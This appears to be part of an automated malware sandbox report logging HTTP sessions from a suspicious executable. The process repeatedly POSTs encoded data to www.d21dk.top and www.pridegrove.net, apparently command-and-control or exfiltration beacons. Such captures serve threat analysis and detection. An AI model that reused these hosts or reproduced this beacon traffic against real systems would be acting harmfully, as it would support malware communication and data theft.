Nov 2, 2024 05:28:17.353108883 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Nov 2024 04:28:17 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66925419-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50045	154.23.184.185	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:19.098647118 CET	697	OUT	POST /fo10/ HTTP/1.1 Host: www.d21dk.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 225 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.d21dk.top Referer: http://www.d21dk.top/fo10/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 59 45 74 49 6c 4f 65 2b 66 30 52 67 49 74 49 64 36 64 76 62 30 48 50 36 46 37 44 65 72 51 62 77 4e 47 73 47 47 78 4e 44 4b 6a 68 64 76 48 63 71 69 62 42 68 6b 77 51 50 47 64 2b 77 56 52 54 6e 73 75 66 71 4e 4b 39 65 45 71 39 45 46 71 37 6e 49 62 63 6c 61 51 46 72 66 36 55 74 32 30 79 61 52 78 51 54 6b 45 69 5a 54 43 38 52 30 5a 68 43 74 5a 56 30 4b 69 45 6f 48 6c 41 72 6a 57 63 7a 45 79 41 62 74 57 32 7a 41 53 79 6b 67 6d 44 69 36 69 62 4f 74 2b 5a 67 50 32 37 51 6b 79 63 34 54 37 2b 38 57 6c 30 6b 57 6b 38 72 6f 52 59 42 62 68 72 32 45 32 79 6f 4b 72 58 32 63 45 30 32 5a 42 48 36 6a 78 2f 39 4a 48 6e 47 71 70 2b 43 32 4f 6f 47 79 35 4d 3d Data Ascii: OrsLbfS8=YEtIlOe+f0RgItId6dvb0HP6F7DerQbwNGsGGxNDKjhdvHcqibBhkwQPGd+wVRTnsufqNK9eEq9EFq7nIbclaQFrf6Ut20yaRxQTkEiZTC8R0ZhCtZV0KiEoHlArjWczEyAbtW2zASykgmDi6ibOt+ZgP27Qkyc4T7+8Wl0kWk8roRYBbhr2E2yoKrX2cE02ZBH6jx/9JHnGqp+C2OoGy5M=
Nov 2, 2024 05:28:19.967575073 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Nov 2024 04:28:19 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66925419-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50046	154.23.184.185	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:21.754659891 CET	10779	OUT	POST /fo10/ HTTP/1.1 Host: www.d21dk.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 10305 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.d21dk.top Referer: http://www.d21dk.top/fo10/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 59 45 74 49 6c 4f 65 2b 66 30 52 67 49 74 49 64 36 64 76 62 30 48 50 36 46 37 44 65 72 51 62 77 4e 47 73 47 47 78 4e 44 4b 6a 70 64 76 31 55 71 6a 34 35 68 6c 77 51 50 59 4e 2b 31 56 52 54 36 73 75 48 55 4e 4b 34 38 45 6f 46 45 48 50 76 6e 50 76 49 6c 4e 41 46 72 64 36 55 67 37 55 79 50 52 78 41 58 6b 45 79 5a 54 43 38 52 30 62 70 43 70 4d 35 30 49 69 45 72 41 6c 41 5a 77 47 63 58 45 79 59 4c 74 57 79 46 41 69 53 6b 67 47 7a 69 33 77 7a 4f 76 65 5a 69 4d 32 36 46 6b 7a 67 6e 54 2f 65 77 57 6d 6f 4f 57 6a 55 72 6f 6c 42 36 48 54 6a 4f 59 77 69 37 5a 5a 37 43 53 32 6f 6f 42 68 62 53 79 41 69 67 4b 6b 4f 74 6b 4c 33 75 71 76 49 42 73 4e 33 75 66 4c 4b 62 34 59 4d 4b 51 66 34 56 64 63 47 74 58 31 76 46 45 74 42 53 4a 41 48 4f 46 33 52 4a 32 78 77 5a 6a 2f 4f 44 34 56 76 65 6d 68 34 37 4f 72 64 44 65 4c 47 38 73 6c 48 67 6f 2b 6b 76 69 45 39 63 64 4c 6b 4b 6a 47 42 77 6a 47 2f 44 47 36 2f 76 6f 52 79 50 67 56 57 31 75 71 71 42 5a 4a 34 76 4d 35 6b 46 6b 37 37 6a 42 43 50 41 43 [TRUNCATED] Data Ascii: OrsLbfS8=YEtIlOe+f0RgItId6dvb0HP6F7DerQbwNGsGGxNDKjpdv1Uqj45hlwQPYN+1VRT6suHUNK48EoFEHPvnPvIlNAFrd6Ug7UyPRxAXkEyZTC8R0bpCpM50IiErAlAZwGcXEyYLtWyFAiSkgGzi3wzOveZiM26FkzgnT/ewWmoOWjUrolB6HTjOYwi7ZZ7CS2ooBhbSyAigKkOtkL3uqvIBsN3ufLKb4YMKQf4VdcGtX1vFEtBSJAHOF3RJ2xwZj/OD4Vvemh47OrdDeLG8slHgo+kviE9cdLkKjGBwjG/DG6/voRyPgVW1uqqBZJ4vM5kFk77jBCPACNeqnuQ6CdPaQO29LO6qDWQzANyKLOrhLwk+QrFsGQa4c7lQw1gQhu4GxgYuRLESR/eng501g0Sf8zvjjCcRUR6cx++jpVE2odrXkDnmdYGJQ2FNQ0A3H8Q94m6RpbgV/++7B9ov2wqXkxjM7o6Lgp2VqCYLbMBBRdAf036DHTc+5mUJT7IqfB9p7E0325bFRDii2eP9SS94Jjcvc7LD0dTDJFAUxTmEWWAEzhOZtSoPghz9UoTMd1nhDZ7inP94FF9XUD0pwHNcpQLRxugW/EsjOHT9ZVbGVOT/tGI9GuCqPs6h4KoZwB0co7mlD5iVbIsa96ujAL9a52h6GafdEMtvwtWNFjry/z6vM2CcYeTuKHjXZvr5NpL9KSzUwT6sStXXFiF58CdrTpB2TxXITeoT4FE3duwS95fzgkBc42twNH+XpxbhuFGWVAPAGuclgPtUlGbVNqwXnkbh4+ob9yzwoE4T3MmxKWWzWUXF3nNtmw4KftteQlQSrEtCcGmrOTOzn30qhSNeL4+VyH1IwHBlcYS7/hXsZPqjv9iWa3XY7jNoccG81hrEk8c1Jdt57AXefwNW+jjb8QORpH5Kudm94LGzX51KDdZ2MN3OferIO9RkugNbyfDaPzT1rHzKvlhipLalJ0Uurqwd/SMpbUPn64M1PUgB6gu [TRUNCATED]
Nov 2, 2024 05:28:22.662085056 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Nov 2024 04:28:22 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66925419-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50047	154.23.184.185	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:24.578783989 CET	430	OUT	GET /fo10/?OrsLbfS8=VGFom56gXSVJA7Re0aPPv0XQBrTc01jEMlgkAyxXIylstn9WlZVIj1RPFIq8ahjYg9DnA65nE6Z/GeehPrQWZwIXYucd9lGrXjcJj26WY1QYvIBel4N9GQA=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1 Host: www.d21dk.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Nov 2, 2024 05:28:25.577965975 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Nov 2024 04:28:25 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66925419-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50048	172.67.217.184	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:31.203032017 CET	692	OUT	POST /tasm/ HTTP/1.1 Host: www.pridegrove.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.pridegrove.net Referer: http://www.pridegrove.net/tasm/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 52 6a 33 49 35 4c 66 4c 5a 45 2f 6b 6f 68 56 49 66 53 39 66 68 38 6a 48 52 7a 31 6c 74 42 74 6f 78 4d 6e 43 43 30 41 52 64 6c 2b 64 4c 4a 44 65 4c 50 34 34 48 48 61 47 35 4b 70 75 77 64 74 49 30 38 75 59 6f 53 2f 32 2b 6a 2b 34 65 74 53 4a 32 50 64 61 41 41 6f 42 78 50 31 33 2f 66 48 47 45 6a 68 46 71 65 70 75 61 71 61 43 4e 30 68 36 65 33 45 44 61 66 4c 36 75 33 6e 73 54 43 78 71 6f 70 63 62 74 45 70 44 65 51 31 45 35 44 31 61 36 33 6d 66 48 6c 4e 33 58 58 67 5a 36 42 38 4e 69 66 67 2f 6a 31 55 79 46 51 7a 68 76 2f 50 4a 46 4f 39 33 69 6e 69 77 36 32 4e 5a 45 6b 68 75 42 77 3d 3d Data Ascii: OrsLbfS8=Rj3I5LfLZE/kohVIfS9fh8jHRz1ltBtoxMnCC0ARdl+dLJDeLP44HHaG5KpuwdtI08uYoS/2+j+4etSJ2PdaAAoBxP13/fHGEjhFqepuaqaCN0h6e3EDafL6u3nsTCxqopcbtEpDeQ1E5D1a63mfHlN3XXgZ6B8Nifg/j1UyFQzhv/PJFO93iniw62NZEkhuBw==
Nov 2, 2024 05:28:32.042135000 CET	1037	IN	HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 04:28:31 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9gk5VFA9U3LdLxcjdBC7FIJ9mTKel7tIICXFJztm1v%2BM5sGnZBxNtVXVUiFhpljjSSeFkXQyUPqRdFWR0MOi%2BcVDcWsOmZJxBcn7NwLaqRn6PuxbCBg8egOQTPjY0f7xSufEd84%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dc160da7b022ca9-DFW Content-Encoding: gzip alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1085&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=692&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 a0 4d 8a 85 58 83 4d 0e 1e 53 f7 e9 06 6a 36 ee be 34 f8 ef 25 29 82 d7 99 6f 86 19 ba ca 5f 36 f5 5b 55 c0 53 fd 5c 42 d5 3c 96 bb 0d ac 6e 11 77 45 bd 45 cc eb fc e2 a4 3a 41 2c f6 2b a3 c8 c9 d7 c9 90 e3 d6 1a 45 d2 c9 89 4d 96 64 b0 f7 02 5b 3f f6 96 f0 22 2a c2 05 a2 a3 b7 3f 73 6e 6d fe 31 6e 6d 14 0d a6 76 0c 81 bf 47 8e c2 16 9a d7 12 a6 36 42 ef 05 3e 66 0e 7c 0f e2 ba 08 91 c3 99 83 26 1c e6 a6 60 14 b5 d6 06 8e d1 3c 0c ed bb 63 4c 75 a6 ef 52 b8 6e 8e 63 2f e3 0d 1c 96 00 b4 02 d3 34 e9 21 74 96 3f 83 3f b3 ee 59 a0 f2 41 e0 3e 21 fc 2b 51 84 cb 4a c2 e5 dd 2f 00 00 00 ff ff e3 02 00 29 44 9b 03 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LAK@+=}iMXMSj64%)o_6[US\B<nwEE:A,+EMd[?"*?snm1nmvG6B>f\|&`<cLuRnc/4!t??YA>!+QJ/)D0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50049	172.67.217.184	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:33.767453909 CET	712	OUT	POST /tasm/ HTTP/1.1 Host: www.pridegrove.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 225 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.pridegrove.net Referer: http://www.pridegrove.net/tasm/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 52 6a 33 49 35 4c 66 4c 5a 45 2f 6b 70 41 6c 49 51 52 6c 66 77 63 6a 45 4e 44 31 6c 6b 68 74 73 78 4d 72 43 43 32 73 42 64 58 61 64 4c 73 2f 65 4b 4b 55 34 4c 6e 61 47 74 61 70 6e 2f 39 74 54 30 38 72 6c 6f 54 54 32 2b 6a 71 34 65 75 47 4a 32 66 68 62 53 41 6f 44 6c 2f 31 31 37 66 48 47 45 6a 68 46 71 61 41 4a 61 71 53 43 4d 46 52 36 66 54 59 45 58 2f 4c 39 70 33 6e 73 58 43 78 75 6f 70 63 70 74 46 31 6c 65 54 4e 45 35 47 4a 61 36 69 47 59 4e 6c 4e 31 61 33 68 61 2b 6a 42 38 6b 4f 64 4a 74 54 49 6d 50 54 62 79 6e 5a 43 54 55 2f 63 67 77 6e 47 44 6e 78 45 74 4a 6e 63 6e 61 37 42 49 35 78 73 34 63 50 43 35 68 77 72 6b 43 6c 62 6c 6d 47 4d 3d Data Ascii: OrsLbfS8=Rj3I5LfLZE/kpAlIQRlfwcjEND1lkhtsxMrCC2sBdXadLs/eKKU4LnaGtapn/9tT08rloTT2+jq4euGJ2fhbSAoDl/117fHGEjhFqaAJaqSCMFR6fTYEX/L9p3nsXCxuopcptF1leTNE5GJa6iGYNlN1a3ha+jB8kOdJtTImPTbynZCTU/cgwnGDnxEtJncna7BI5xs4cPC5hwrkClblmGM=
Nov 2, 2024 05:28:34.614444971 CET	1053	IN	HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 04:28:34 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LB%2Fzw5zl2%2BoA%2F%2Fd%2FYh1az8B5I01OBgwc085cIYjyhMSp0ZXaHIbH%2BP53%2FEb24zunVIjzzWI%2FIQT%2F5vVApMzmOfBO%2FGrILaAEwQovQrJuiiB4TjTt4llEhWTmOCwKkB0NInEgxfY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dc160ea7b87e7e3-DFW Content-Encoding: gzip alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1071&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=712&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 a0 4d 8a 85 58 83 4d 0e 1e 53 f7 e9 06 6a 36 ee be 34 f8 ef 25 29 82 d7 99 6f 86 19 ba ca 5f 36 f5 5b 55 c0 53 fd 5c 42 d5 3c 96 bb 0d ac 6e 11 77 45 bd 45 cc eb fc e2 a4 3a 41 2c f6 2b a3 c8 c9 d7 c9 90 e3 d6 1a 45 d2 c9 89 4d 96 64 b0 f7 02 5b 3f f6 96 f0 22 2a c2 05 a2 a3 b7 3f 73 6e 6d fe 31 6e 6d 14 0d a6 76 0c 81 bf 47 8e c2 16 9a d7 12 a6 36 42 ef 05 3e 66 0e 7c 0f e2 ba 08 91 c3 99 83 26 1c e6 a6 60 14 b5 d6 06 8e d1 3c 0c ed bb 63 4c 75 a6 ef 52 b8 6e 8e 63 2f e3 0d 1c 96 00 b4 02 d3 34 e9 21 74 96 3f 83 3f b3 ee 59 a0 f2 41 e0 3e 21 fc 2b 51 84 cb 4a c2 e5 dd 2f 00 00 00 ff ff e3 02 00 29 44 9b 03 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LAK@+=}iMXMSj64%)o_6[US\B<nwEE:A,+EMd[?"*?snm1nmvG6B>f\|&`<cLuRnc/4!t??YA>!+QJ/)D0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50050	172.67.217.184	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:36.311476946 CET	10794	OUT	POST /tasm/ HTTP/1.1 Host: www.pridegrove.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 10305 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.pridegrove.net Referer: http://www.pridegrove.net/tasm/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 52 6a 33 49 35 4c 66 4c 5a 45 2f 6b 70 41 6c 49 51 52 6c 66 77 63 6a 45 4e 44 31 6c 6b 68 74 73 78 4d 72 43 43 32 73 42 64 58 53 64 4c 5a 7a 65 4c 74 67 34 46 48 61 47 75 61 70 71 2f 39 74 65 30 36 44 68 6f 54 50 63 2b 68 53 34 66 4f 61 4a 6e 64 46 62 59 41 6f 44 6e 2f 31 32 2f 66 48 50 45 6a 78 65 71 65 6b 4a 61 71 53 43 4d 47 35 36 4a 33 45 45 45 50 4c 36 75 33 6e 6f 54 43 78 47 6f 70 6b 35 74 46 68 54 66 69 74 45 2b 6d 35 61 31 32 6d 59 4f 46 4e 37 66 33 68 34 2b 6a 4e 6e 6b 50 78 2f 74 54 55 4d 50 51 48 79 6c 73 33 31 57 4f 4e 33 69 78 4b 42 39 78 49 31 4e 58 51 55 55 71 4a 70 35 67 38 45 4d 2b 2b 30 70 51 71 6a 66 47 61 6e 34 6a 54 37 39 6f 71 67 49 42 6c 4a 38 5a 59 71 43 38 74 54 57 4b 4f 31 58 51 62 42 50 38 6a 63 36 30 45 69 51 47 4f 54 78 2b 37 75 33 33 4f 33 55 57 64 34 78 49 73 63 65 35 52 5a 34 32 71 67 70 70 6f 43 48 74 6e 4d 41 49 50 7a 6b 58 62 42 2b 50 6b 4d 78 70 63 39 43 73 52 55 75 48 31 57 48 6c 4d 6e 6c 62 34 52 68 6b 48 32 44 4e 77 42 77 4a 5a 59 5a [TRUNCATED] Data Ascii: OrsLbfS8=Rj3I5LfLZE/kpAlIQRlfwcjEND1lkhtsxMrCC2sBdXSdLZzeLtg4FHaGuapq/9te06DhoTPc+hS4fOaJndFbYAoDn/12/fHPEjxeqekJaqSCMG56J3EEEPL6u3noTCxGopk5tFhTfitE+m5a12mYOFN7f3h4+jNnkPx/tTUMPQHyls31WON3ixKB9xI1NXQUUqJp5g8EM++0pQqjfGan4jT79oqgIBlJ8ZYqC8tTWKO1XQbBP8jc60EiQGOTx+7u33O3UWd4xIsce5RZ42qgppoCHtnMAIPzkXbB+PkMxpc9CsRUuH1WHlMnlb4RhkH2DNwBwJZYZfazPkjHIifoTfyA8p00ms1+VsLmfnHg7D+gP4PJ8w1rv04fjlVDi67z3SLBl81rwI7AE/gSgJMEbejVsybVcbsNoqm9P4ji/THxsQEdih4qY9Kh/94NIWrkT2PVK+2FCBLRTQ/MTXB7W8kaEku/kKmM/4crOTvdzJG3+/9sQekBA+5jYRgO2jGzNuDLDsfa1ehNtG9AH9aKQ9DzuuN2pAAuk+WfD/J0pJDSIEFccnGpkexvlGuROLD70gNnbU2m1GH+8GQ1+/5pHrWdTnRTdNuSF5SzsSXnFPe4b/jgc6yR46XiY3mmDfFJ55hBYRkklnl9043o8y4hneeNV3Pzg9iv4Id1WoaDxXE0SHBL3tIZLBGf49x3sHCZAk6uDk3TSnOJy4Y4RCzf+NWMC2zmtqn4uTyLrP/WDnST6BzfntyUb/IjBKMZvfrVYpHexGph37iTtzaxa3uOcYGbxf76ANl/Brjfszz210TW5z/W5aWMnzT7+UmxXZ4vMY+4iEsO1f/1TV5/rip+m9XSe/QIGHiP3tYZUrc6+OUw7+9VV8fxUzLmJOJ7eiUH7FACOKOY0L/ofWUzIiiky6Xx9LH3eocsaVyaWp6tEzpwMR2sdx/eEwNZtAH5M0S7MLf/7Ho6xKslF63/yYkXPQpP/aXFQybm0nUKhv9JLSI [TRUNCATED]
Nov 2, 2024 05:28:37.137547970 CET	1052	IN	HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 04:28:37 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2B%2BSa68x0UE%2B7mVggd0mn%2BXS4dcaG3yur8kfLAzoyO8t%2FycK32Jk3vdXjgGvyAgE%2BDQdiiEvvl1rNKZuLaS%2FPi2AIMGKNNYQ4IQ5jRLwZfJ%2BDSyXy8zpnT9SUDpKcFPOeNl7cr4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dc160fa4d322c9c-DFW Content-Encoding: gzip alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1665&sent=5&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10794&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 a0 4d 8a 85 58 83 4d 0e 1e 53 f7 e9 06 6a 36 ee be 34 f8 ef 25 29 82 d7 99 6f 86 19 ba ca 5f 36 f5 5b 55 c0 53 fd 5c 42 d5 3c 96 bb 0d ac 6e 11 77 45 bd 45 cc eb fc e2 a4 3a 41 2c f6 2b a3 c8 c9 d7 c9 90 e3 d6 1a 45 d2 c9 89 4d 96 64 b0 f7 02 5b 3f f6 96 f0 22 2a c2 05 a2 a3 b7 3f 73 6e 6d fe 31 6e 6d 14 0d a6 76 0c 81 bf 47 8e c2 16 9a d7 12 a6 36 42 ef 05 3e 66 0e 7c 0f e2 ba 08 91 c3 99 83 26 1c e6 a6 60 14 b5 d6 06 8e d1 3c 0c ed bb 63 4c 75 a6 ef 52 b8 6e 8e 63 2f e3 0d 1c 96 00 b4 02 d3 34 e9 21 74 96 3f 83 3f b3 ee 59 a0 f2 41 e0 3e 21 fc 2b 51 84 cb 4a c2 e5 dd 2f 00 00 00 ff ff e3 02 00 29 44 9b 03 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LAK@+=}iMXMSj64%)o_6[US\B<nwEE:A,+EMd[?"*?snm1nmvG6B>f\|&`<cLuRnc/4!t??YA>!+QJ/)D0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50051	172.67.217.184	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:38.856440067 CET	435	OUT	GET /tasm/?5Js0X=9zex_vxPfbpDzDPp&OrsLbfS8=chfo68G3UC6OuE1JdDwjtuzwRmQzr0xqwO/eOUQkfVCUJ5qSOOAIPBbq5Mxy74dO36b9klXa7DOIS8apv5M0ByBegKUf2d3tajwjl7F6aqulZkhUeXkvRMs= HTTP/1.1 Host: www.pridegrove.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
